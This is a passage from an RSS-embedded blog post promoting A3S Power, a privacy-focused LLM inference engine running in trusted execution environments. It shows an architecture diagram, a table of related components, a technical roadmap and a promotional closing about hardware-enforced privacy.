│  │  ┌────────────────────────────────────────────────────┐  │    │
│  │  │  a3s-power                                         │  │    │
│  │  │  OpenAI API ← Vsock/RA-TLS → Host                 │  │    │
│  │  └────────────────────────────────────────────────────┘  │    │
│  │  Hardware-encrypted memory — host cannot read             │    │
│  └──────────────────────────────────────────────────────────┘    │
│       ▲ Vsock                                                     │
│       │                                                           │
│  ┌────┴─────────┐  ┌──────────────┐  ┌────────────────────────┐  │
│  │  a3s-gateway │  │  a3s-event   │  │  a3s-code              │  │
│  │  (API routing│  │  (event bus) │  │  (AI coding agent)     │  │
│  └──────────────┘  └──────────────┘  └────────────────────────┘  │
│                                                                   │
│  Client:                                                          │
│  ┌──────────────────────────────────────────────────────────┐    │
│  │  a3s-power verify SDK                                     │    │
│  │  Nonce binding · Model hash binding · Hardware sig verify │    │
│  └──────────────────────────────────────────────────────────┘    │
└──────────────────────────────────────────────────────────────────┘
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Component&lt;/th&gt;
&lt;th&gt;Relationship with Power&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;a3s-box&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Hosts Power inside TEE MicroVM&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;a3s-code&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Uses Power as local inference backend&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;a3s-gateway&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Routes inference requests to Power instances&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;a3s-event&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Distributes inference events&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;verify SDK&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Client attestation verification&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  Technical Roadmap
&lt;/h3&gt;

&lt;p&gt;Three things in progress:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Expanding TEE hardware support&lt;/strong&gt; — Intel TDX support is already reserved in the architecture (&lt;code&gt;TeeType::Tdx&lt;/code&gt; variant defined, ioctl calls implemented). ARM CCA (Confidential Compute Architecture) is on the future radar&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GPU TEE acceleration&lt;/strong&gt; — AMD SEV-SNP has begun supporting GPU TEE (Confidential GPU), meaning A3S Power's multi-backend architecture can seamlessly upgrade: same security layer + GPU-accelerated backend, inference throughput increases by tens of times while maintaining hardware-level privacy protection. picolm solves the "can it run" problem; GPU TEE backends solve the "how fast can it run" problem&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Deeper ecosystem integration&lt;/strong&gt; — Tighter integration with a3s-box MicroVM to automate TEE deployment workflows. Integration with the a3s-code AI coding agent framework to let AI Agents reason under TEE protection&lt;/li&gt;
&lt;/ol&gt;




&lt;p&gt;Back to the opening scenario. The client portfolio and trading strategy information that trader typed, from the moment it left the keyboard, went through RA-TLS attestation handshake, TEE hardware memory encryption, model identity verification, layer-streaming inference, log redaction, and memory zeroing — every step with cryptographic guarantees, depending on no one's goodwill.&lt;/p&gt;

&lt;p&gt;And inside the TEE, that 10B model isn't just answering the trader's question. It's simultaneously doing three things: checking whether this prompt contains injection attacks, intelligently redacting client information and position data from the returned results, and approving subsequent sensitive tool calls that might be triggered. These security decisions must be made inside hardware-encrypted memory, and must be made by a model smart enough to do so — picolm's layer-streaming inference lets a 256MB EPC run a 10B model, making all of this possible.&lt;/p&gt;

&lt;p&gt;This isn't "we promise not to look at your data." This is "even if we wanted to look, the hardware won't allow it."&lt;/p&gt;

&lt;p&gt;858 tests ensure the correct implementation of these technical choices. The pure Rust minimal TCB (~1,220 dependency tree lines) ensures the inference path is fully auditable. And for users, the experience is as simple as using Ollama — send a request, get a result.&lt;/p&gt;

&lt;p&gt;The difference is: this time, you don't need to trust anyone. And you don't need an expensive server — a $10 piece of hardware with 256MB of memory is enough.&lt;/p&gt;




&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;A3S Power — A Privacy LLM Inference Engine on $10 Hardware.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

</description>
      <category>ai</category>
      <category>agents</category>
      <category>os</category>
    </item>
  </channel>
</rss>
